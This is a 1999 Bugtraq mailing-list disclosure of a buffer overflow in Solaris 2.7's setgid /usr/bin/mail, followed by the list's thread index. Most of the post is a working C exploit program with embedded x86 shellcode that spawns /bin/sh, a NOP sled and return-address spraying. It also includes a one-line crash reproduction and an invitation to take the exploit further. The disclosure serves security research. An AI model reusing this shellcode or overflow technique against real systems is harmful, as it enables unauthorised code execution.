Bugtraq mailing list archives
Solaris 2.7 /usr/bin/mail
From: btellier () WEBLEY COM (Brock Tellier)
Date: Mon, 13 Sep 1999 11:22:14 -0500
Greetings,
There is a possible buffer overflow vulnerability in Solaris 2.7's sgid
mail /usr/bin/mail. The reason it's only a possibility and not a full
blow exploit is that mail drops sgid privs before the overflow occurs.
However as we've seen in several past posts, this is not necessarily a
bulletproof method of making ones program secure. Obviously mail needs
these privs to perform some function, probably opening the appropriate
mail owned files to deliver mail. My guess would be that in the
following usage, mail would need write (read?) access to foo's mail file.
bash-2.02$ mail -m `perl -e "print 'A' x 2106"` foo
.
mail: ERROR signal 11
bash-2.02$
In any case, this overflow does allow execution of any command you wish
as shown in the program at the end of this message. I would imagine that
with some careful asm code, one would be able to exploit the specific
vulnerability that may exist. Information on exactly what mail does with
it's s bit would be helpful.
Brock Tellier
UNIX Systems Administrator
Webley Systems
www.webley.com
--- solx86.c ---
/*
* Generic Solaris x86 exploit program by Brock Tellier
* Shellcode by Cheez Whiz
* gcc -o mailex solx86.c
* /usr/bin/mail -m `./mailex 0 1985 2285` foo
. <period, enter>
$ <not a rootshell ;)>
* Usage: ./mailex <offset> <NOPS> <BUFSIZE>
*
* Demonstrative program for mail vulnerability. mail apparently drops
privs
* before the overflow occurs so we're not going to have a sgid mail
shell.
* Perhaps someone could make some 'shellcode' to exploit an open file
* descriptor or something (whatever the reason mail is sgid mail).
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUF 10000
#define NOP 0x90
char shell[] =
"\xeb\x3b\x9a\xff\xff\xff\xff\x07\xff"
"\xc3\x5e\x31\xc0\x89\x46\xc1\x88\x46"
"\xc6\x88\x46\x07\x89\x46\x0c\x31\xc0"
"\x50\xb0\x17\xe8\xdf\xff\xff\xff\x83"
"\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53"
"\x8d\x1e\x89\x5e\x08\x53\xb0\x3b\xe8"
"\xc8\xff\xff\xff\x83\xc4\x0c\xe8\xc8"
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff";
unsigned long int nop;
unsigned long int esp;
long int offset;
char buf[BUF];
unsigned long int get_esp()
{
__asm__("movl %esp,%eax");
}
void
main (int argc, char *argv[])
{
int buflen, i;
if (argc > 1)
offset = strtol(argv[1], NULL, 0);
if (argc > 2)
nop = strtoul(argv[2], NULL, 0);
else
nop = 285;
if (argc > 3)
buflen=atoi(argv[3]);
else
buflen=BUF;
esp = get_esp();
memset(buf, NOP, buflen);
memcpy(buf+nop, shell, strlen(shell));
for (i = nop+strlen(shell); i < buflen-4; i += 4)
*((int *) &buf[i]) = esp+offset;
for (i = 0; i < strlen(buf); i++) putchar(buf[i]);
return;
}
---
Current thread:
- Re: Redhat 6.0 Password Issues, (continued)
- Re: Redhat 6.0 Password Issues Erik Parker (Sep 11)
- Re: Redhat 6.0 Password Issues Alan Brown (Sep 11)
- CGI security Kerb (Sep 12)
- Re: CGI security Ivo van der Wijk (Sep 13)
- Re: CGI security Vladimir Dubrovin (Sep 14)
- Re: CGI security Arturo Busleiman (Sep 14)
- Multiple vulnerabilities in CDE Job de Haas (Sep 13)
- Re: Multiple vulnerabilities in CDE Troy A. Bollinger (Sep 13)
- Re: Multiple vulnerabilities in CDE Dan Astoorian (Sep 14)
- Vulnerability in dtspcd Job de Haas (Sep 13)
- Solaris 2.7 /usr/bin/mail Brock Tellier (Sep 13)
- Stack Shield 0.5 beta vendicator () USA NET (Sep 13)
- Re: Redhat 6.0 Password Issues Scott Manley (Sep 12)
- Re: Redhat 6.0 Password Issues Roger Espel Llima (Sep 12)
- Vulnerability in dtsession Job de Haas (Sep 13)